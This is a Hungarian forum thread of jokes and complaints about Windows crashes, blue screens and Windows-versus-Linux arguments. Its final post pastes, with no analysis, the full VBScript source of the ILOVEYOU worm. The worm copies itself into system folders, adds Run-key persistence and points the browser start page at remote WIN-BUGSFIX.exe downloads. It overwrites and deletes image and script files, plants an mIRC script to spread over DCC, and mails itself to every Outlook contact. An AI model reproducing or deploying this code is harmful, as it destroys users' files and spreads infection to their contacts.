Jump to content
PirateClub.hu

Mi a szar a "Windowsban"?


zsolesz008
 Share

Recommended Posts

mi a külömbség a windows és a szar között?

a szarbol kilehet lépni :D

×D

 

engem tökre kiakasztott, hogy multhéten 2 napon belül legalább 50-szer indult újra vagy indítottam újra. volt h el se indult. csökkentett módban egyprocesszoros pc-t talált. hibakeresésnél "árván maradt fájl"-okat talált :blink:

aztán utánnanéztem h mi lehet a baja, lefuttattam egy memótesztet, és végre meglett, hogy tönkrement az 512-es memóriám...

miért nem tudta megmondani vagy utalni rá? miért kellet ez a sok hülyeség?

 

ez nemtom h a win hibája-e, de ha megszakítok egy nyomtatást, utánna meg újra bekapcsolom a nyomtatót, min 20 oldalon keresztül hülyeségeket nyomtat :angry:

 

utálom még, hogyha egy mappát akarok törölni amiben több dolog is van, néha kitalálja, hogy a mappa nem törölhető, mert nem üres...

nemures.bmp

 

ismerősömnek nem olvasta a win a memóriakártyáját, formázni akarta. az Ubuntu simán beolvasta. miért?

 

utálom még, hogy sokat kell várni, hogy megjelenjen a jobb gomb menüje

 

...stb

 

szerk: képet raktam be

Link to comment
Share on other sites

  • Replies 73
  • Created
  • Last Reply

Top Posters In This Topic

Mindenki szidja (kivéve aki nem), lefosozza a Windows-t. Méghogy nincs másik oprendszer: Linux, Mac és képzeljétek a Linuxban van egy program aza neve hogy Wine és Windowsos programokat lehet vele emulálni. Énis használtam Linuxot de most mégis Windowson vagyok. Akinek állandóan lefagy a Windowsa az azért lehet mert nem kezeli normálisan. Kb. olyakat mondtok mintha kapnátok egy cipőt és magától lenne sáros, nem azért mert pocsolyába léptetek. Kicsit kellene gondolkodni mit is írtok. Nekem nem szokott lefagyni a Windowsom. A belassulást annak köszönhetitek hogy a Winchester-t nem szoktátok töredezettségmentesíteni. Ha szoktatok is akkor valami fut a háttérben és az lassítja a gépet. Szóval a Windows nem sz@r, csak kényes. Énis számtalanszor raktam már újra a Windowst de mindig az én hibámból volt: kékhalál, lassulás, stb.. Az IE tényleg lassú (de ki mondta hogy nincs más?). Ott van a Mozilla Firefox 3 ami bebizonyította hogy díjnyertes és szuper gyors böngésző. Aki azt hiszi hogy más oprendszerre azért nincs vírus mert, jó az nagyon téved!!!! Azért nincs vírus mert Linuxra, Mac-ra vírust készíteni nincs igény, nem használják sokan, így a hacker feleslegesen készítene vírust rá. Tévedés: Mac-ra van vírus:

 

Megjelent az első trójai Mac-re

http://pcforum.hu/hirek/10754/Megjelent+az+elso+trojai+Mac-re.html

 

 

Aki pedig nagyon szidja a Windows-t az olvassa el ezeket:

A legtöbb vírust saját magunk telepítjük

http://pcforum.hu/hirek/10931/A+legtobb+virust+sajat+magunk+telepitjuk.html

Csak érdektelenség miatt nem törik a Linuxokat

http://pcforum.hu/hirek/10865/Csak+erdektelenseg+miatt+nem+torik+a+Linuxokat.html

Megbízhatóbban frissíthető a Windows mint a Linux vagy a Mac

http://pcforum.hu/hirek/10966/Megbizhatobban+frissitheto+a+Windows+mint+a+Linux+es+a+MacOS.html

 

Módosította ica
Link to comment
Share on other sites

  • 8 months later...

Ezt akartam mondani én is :P:lol:. De érdekes, ha megvan normálisan csinálva és nem vandálkodok, akkor sokáig jó és hibamentesen fut. Volt már hogy több mint egy évig jó volt. Szóval működhet, csak óvatosan.

Link to comment
Share on other sites

  • 1 month later...

Zsolt '83, szerintem van benne kaki, csak a "Háttérben futó szagtalanító szolgáltatás" blokkolja a szag továbbterjedését. :D

 

Egyébként nekem játék közben szokott lefagyni, és már réges-régen Linuxot használnék ha a legtöbb és leghasználhatóbb programokat arra írnák...

De hát amíg a World of Warcraft-ot nem írják át addig bizony a windows-zal szenvedek tovább...

További jó windows szidást :P

Link to comment
Share on other sites

Pedig a WoW megy Ubuntun :D Én is futtattam Wine alatt :D

 

A Windowsban MINDEN rossz. A háttérben futó alkalmazások nyelik a memóriát, sok a rejtélyes lefagyás. Arról nem is beszélek, hogy pont akkor kell neki lefagynia/újraindulni, amikor valami dolgom van. Az egyetlen visszatartó dolog a Linux disztribúcióktól, a developer alkalmazások. Nem túl jó átiratai vannak Linuxra.

Akinek viszont ilyen igénye nincs, az bátran telepíthet Linuxot. Nem kell több vírusírtó és biztonságosabb ;)

Link to comment
Share on other sites

nem tom mindenki szidja a Windowst. mégis mindenki azt használja.

a Vistát is agyon kritizálták. nekem a Vista gyorsabb stabilabb volt mint egy Xp.

ugyan azokat a progikat használtam mint Xp-én. és egy kék halált se láttam a képernyőmön.

nem tetszik ne használt ennyih:)

Link to comment
Share on other sites

  • 3 weeks later...

Nekem semmi bajom nem lenne vele, ha nem lennének kékhalálok... a többit tudom, hogy az én hibám, ha nem működik (vagy nem :D)

Egyébként Geri345, nagyon gratulálok, hogy bírja a Vistád! :lol: Én 3 naponta telepítettem újra amikor az volt... elég is volt belőle.

Egyébként nekem Windows 7 RC alatt már sikerült előhoznom kékhalált! :lol::P

Link to comment
Share on other sites

Mindenki szidja (kivéve aki nem), lefosozza a Windows-t. Méghogy nincs másik oprendszer: Linux, Mac és képzeljétek a Linuxban van egy program aza neve hogy Wine és Windowsos programokat lehet vele emulálni. Énis használtam Linuxot de most mégis Windowson vagyok. Akinek állandóan lefagy a Windowsa az azért lehet mert nem kezeli normálisan. Kb. olyakat mondtok mintha kapnátok egy cipőt és magától lenne sáros, nem azért mert pocsolyába léptetek. Kicsit kellene gondolkodni mit is írtok. Nekem nem szokott lefagyni a Windowsom. A belassulást annak köszönhetitek hogy a Winchester-t nem szoktátok töredezettségmentesíteni. Ha szoktatok is akkor valami fut a háttérben és az lassítja a gépet. Szóval a Windows nem sz@r, csak kényes. Énis számtalanszor raktam már újra a Windowst de mindig az én hibámból volt: kékhalál, lassulás, stb.. Az IE tényleg lassú (de ki mondta hogy nincs más?). Ott van a Mozilla Firefox 3 ami bebizonyította hogy díjnyertes és szuper gyors böngésző. Aki azt hiszi hogy más oprendszerre azért nincs vírus mert, jó az nagyon téved!!!! Azért nincs vírus mert Linuxra, Mac-ra vírust készíteni nincs igény, nem használják sokan, így a hacker feleslegesen készítene vírust rá. Tévedés: Mac-ra van vírus:

ricsike012 egyetértek veled és teljesen igazad van, hogy mindenki szidja a windowst, és legtöbben azért mert nem is kezelik. De most gondolj bele a linuxra, vagy a macre. Na most felvilágosítalak téged 1 picit az operációs rendszerekkel kapcsolatban, mert úgy látszik nem eléggé ismered őket. Nekem régebben windowsom volt ,és semmi bajom nem volt vele, ha 2-3 hetente minimum lefuttattam,

1 disc cleanert,

1 antivirust,

1 spyware írtót,

1 malware írtót,

1defragler

1 registry cleanert

Ezek a kisebb karbantartások több napomba telett míg befejeztem. Fojton kellett keresgélni a vírusírtókat, hogy vajon melyik a legjobb, de úgylátszik nincs olyan free antivírus ami a legjobb, mert nincs olyan amit mindent tudna. Ha az egyik ezt tudja, akkor a másik nem, és fordítva is így van. 3 hét alatt több mint 40 mega fölösleg, logfájlok, és egyébb ideiglenes fájlok lepték el az operációs rendszert.

Na most jön a linux.

Gondoltam, hogy vajon kell e a linuxra disc cleaner. Le is töltöttem egyet a csomagkezelőből, és eléggé meglepődtem. Már akkor több hónapja haználtam a linuxot, és minössze 300kb-nyi fölösleg volt rajta. Antivírus minek kell?? több ezer vírus van a vinyón, és még wine-on sem futnak el.spyware sem kell, és malware írtó sem kell. Defragler sem kell, hisz a linux fájlrendszer (EXT és annak ujabbjak) kitalálója megoldotta már rég azt az ügyet, hogy ne kelljen ilyenekkel szarozni. Registry cleaner: én erre csak ennyit mondok: linuxra? XD

Macet nem ismerem, és nem is áll szándékomban egyenlőre, de gondolom hasonlóak a tulajdonságai mint a linuxra. semmi ilyesmire nincs szükség.

És most jöjjön 1 kis történet rólam, aki szeret olvasni XD

Régen rühelltem a linuxokat, és kimondottan utálltam. Aztán amióta elkezdtem tanulgatni az informatikát ( ne az iskolára gonoljatok) gondoltam, hogy letöltök 1 linuxot, hisz mért ne?? végül is free, és open source. Aztán szépen kiíram cd-re és kipróbáltam live cd-n. Annyira beleszerettem a linuxokba (de csak azért mert live cd XD) hogy elkezdtem gyüjteni őket. A végén össze jött 1 jópár, és megkaptam a számítógépet, ami régebben közös volt a családdal, hát a magamé lett :D. A windows 1 idővel összeomlott (mint mindig) és gondoltam, hogy amíg nem szerzek 1 rendes windowst, felrakok 1 linuxot, de max 1 hétre, vagy amíg meg nem szereztem az op renyót. És hát azóta, lassan 3/4 éve azt a linuxot használom, és semmi baja nincsen vele. Ebben nekem az volt a tanulság, hogy ne szarozzak arról amiről nem is tudok, ezért nem mondok semmit a macről, vagy bármi másról amit nem ismerek. Ez csupán az előítélet volt ami épp rossz volt.

És visszatérve a macre. Szerintem 10 év mulva az lessz a toplistán az első és mindenki azt fogja használni. Viszont a vírusok száma is meg fog nőlni mint a windowsnál, és mindenki azt is szidni fogja. De ez csak a jövő, majd meglátjuk mi lessz.

Link to comment
Share on other sites

  • 1 month later...

 

 

hadja magát hogy bejussanak a trójaikat!



lehetséges...

 
 On Error Resume Next
 dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
 eq=""
 ctr=0
 Set fso = CreateObject("Scripting.FileSystemObject")
 set file = fso.OpenTextFile(WScript.ScriptFullname,1)
 vbscopy=file.ReadAll
 main()
 sub main()
 On Error Resume Next
 dim wscr,rr
 set wscr=CreateObject("WScript.Shell")
 rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout")
 if (rr>=1) then
 wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
 end if
 Set dirwin = fso.GetSpecialFolder(0)
 Set dirsystem = fso.GetSpecialFolder(1)
 Set dirtemp = fso.GetSpecialFolder(2)
 Set c = fso.GetFile(WScript.ScriptFullName)
 c.Copy(dirsystem&"\MSKernel32.vbs")
 c.Copy(dirwin&"\Win32DLL.vbs")
 c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
 regruns()
 html()
 spreadtoemail()
 listadriv()
 end sub
 sub regruns()
 On Error Resume Next
 Dim num,downread
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern el32",dirsystem&"\MSKernel32.vbs"
 regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService s\Win32DLL",dirwin&"\Win32DLL.vbs"
 downread=""
 downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Download Directory")
 if (downread="") then
 downread="c:\"
 end if
 if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
 Randomize
 num = Int((4 * Rnd) + 1)
 if num = 1 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm
 hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
 elseif num = 2 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw
 erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
 elseif num = 3 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd
 QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
 elseif num = 4 then
 regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
 Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD
 GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN -BUGSFIX.exe"
 end if
 end if
 if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then regcreate
 "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU GSFIX",downread&"\WIN-BUGSFIX.exe"
 regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet
 Explorer\Main\Start Page","about:blank"
 end if
 end sub
 sub listadriv
 On Error Resume Next
 Dim d,dc,s
 Set dc = fso.Drives
 For Each d in dc
 If d.DriveType = 2 or d.DriveType=3 Then
 folderlist(d.path&"\")
 end if
 Next
 listadriv = s
 end sub
 sub infectfiles(folderspec)
 On Error Resume Next
 dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
 set f = fso.GetFolder(folderspec)
 set fc = f.Files
 for each f1 in fc
 ext=fso.GetExtensionName(f1.path)
 ext=lcase(ext)
 s=lcase(f1.name)
 if (ext="vbs") or (ext="vbe") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 bname=fso.GetBaseName(f1.path)
 set cop=fso.GetFile(f1.path)
 cop.copy(folderspec&"\"&bname&".vbs") fso.DeleteFile(f1.path)
 elseif(ext="jpg") or (ext="jpeg") then
 set ap=fso.OpenTextFile(f1.path,2,true)
 ap.write vbscopy
 ap.close
 set cop=fso.GetFile(f1.path)
 cop.copy(f1.path&".vbs")
 fso.DeleteFile(f1.path)
 elseif(ext="mp3") or (ext="mp2") then
 set mp3=fso.CreateTextFile(f1.path&".vbs")
 mp3.write vbscopy
 mp3.close
 set att=fso.GetFile(f1.path)
 att.attributes=att.attributes+2
 end if
 if (eq<>folderspec) then
 if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
 set scriptini=fso.CreateTextFile(folderspec&"\script.ini") scriptini.WriteLine "[script]"
 scriptini.WriteLine ";mIRC Script"
 scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"
 scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"
 scriptini.WriteLine ";"
 scriptini.WriteLine ";Khaled Mardam-Bey"
 scriptini.WriteLine ";http://www.mirc.com"
 scriptini.WriteLine ";"
 scriptini.WriteLine "n0=on 1:JOIN:#:{"
 scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick
 "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
 scriptini.WriteLine "n3=}"
 scriptini.close
 eq=folderspec
 end if
 end if
 next
 end sub
 sub folderlist(folderspec)
 On Error Resume Next
 dim f,f1,sf
 set f = fso.GetFolder(folderspec)
 set sf = f.SubFolders
 for each f1 in sf
 infectfiles(f1.path)
 folderlist(f1.path)
 next
 end sub
 sub regcreate(regkey,regvalue)
 Set regedit = CreateObject("WScript.Shell")
 regedit.RegWrite regkey,regvalue
 end sub
 function regget(value)
 Set regedit = CreateObject("WScript.Shell")
 regget=regedit.RegRead(value)
 end function
 function fileexist(filespec)
 On Error Resume Next
 dim msg
 if (fso.FileExists(filespec)) Then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 function folderexist(folderspec)
 On Error Resume Next
 dim msg
 if (fso.GetFolderExists(folderspec)) then
 msg = 0
 else
 msg = 1
 end if
 fileexist = msg
 end function
 sub spreadtoemail()
 On Error Resume Next
 dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
 set regedit=CreateObject("WScript.Shell")
 set out=WScript.CreateObject("Outlook.Application")
 set mapi=out.GetNameSpace("MAPI")
 for ctrlists=1 to mapi.AddressLists.Count
 set a=mapi.AddressLists(ctrlists)
 x=1
 regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) if (regv="") then
 regv=1
 end if
 if (int(a.AddressEntries.Count)>int(regv)) then
 for ctrentries=1 to a.AddressEntries.Count
 malead=a.AddressEntries(x)
 regad=""
 regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead )
 if (regad="") then
 set male=out.CreateItem(0)
 male.Recipients.Add(malead)
 male.Subject = "ILOVEYOU"
 male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
 male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD" end if
 x=x+1
 next
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count else
 regedit.RegWrite
 "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count end if
 next
 Set out=Nothing
 Set mapi=Nothing
 end sub
 sub html
 On Error Resume Next
 dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
 dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -
 LOVELETTER@-@>"&vbcrlf& _ "<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
 @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ "<META NAME=@-@Description@-@
 CONTENT=@-@simple but i think this is good...@-@>"&vbcrlf& _
 "<?-?HEAD><BODY
 ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.
 HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
 "ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU. HTM#-#,#-#main#-#)@-@
 BGPROPERTIES=@-@fixed@-@
 BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
 "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to read this HTML file<BR>- Please press #-#YES#-# button to
 Enable ActiveX<?-?p>"&vbcrlf& _
 "<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
 BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQU EE> "&vbcrlf& _
 "<?-?BODY><?-?HTML>"&vbcrlf& _
 "<SCRIPT language=@-@JScript@-@>"&vbcrlf& _ "<!--?-??-?"&vbcrlf& _
 "if (window.screen){var wi=screen.availWidth;var
 hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrl f& _
 "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"&vbcrlf& _
 "<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _ "<!--"&vbcrlf& _
 "on error resume next"&vbcrlf& _
 "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _ "aw=1"&vbcrlf& _
 "code="
 dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
 "set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _ "code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
 "code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _ "code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _ "set
 wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
 "wri.write code4"&vbcrlf& _
 "wri.close"&vbcrlf& _
 "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _ "if (err.number=424) then"&vbcrlf& _
 "aw=0"&vbcrlf& _
 "end if"&vbcrlf& _
 "if (aw=1) then"&vbcrlf& _
 "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _ "window.close"&vbcrlf& _
 "end if"&vbcrlf& _
 "end if"&vbcrlf& _
 "Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
 "regedit.RegWrite
 @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^
 -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _ "?-??-?-->"&vbcrlf& _
 "<?-?SCRIPT>"
 dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
 dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""") dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
 dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
 dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
 dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
 dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
 set fso=CreateObject("Scripting.FileSystemObject")
 set c=fso.OpenTextFile(WScript.ScriptFullName,1)
 lines=Split(c.ReadAll,vbcrlf)
 l1=ubound(lines)
 for n=0 to ubound(lines)
 lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
 lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then
 lines(n)=chr(34)+lines(n)+chr(34)
 else
 lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" end if
 next
 set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close
 set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5
 d.write join(lines,vbcrlf)
 d.write vbcrlf
 d.write dt6
 d.close
 end sub
Módosította programozo
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Hozzászólás a témához...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Jelenleg olvassa   0 members

    • No registered users viewing this page.



×
×
  • Create New...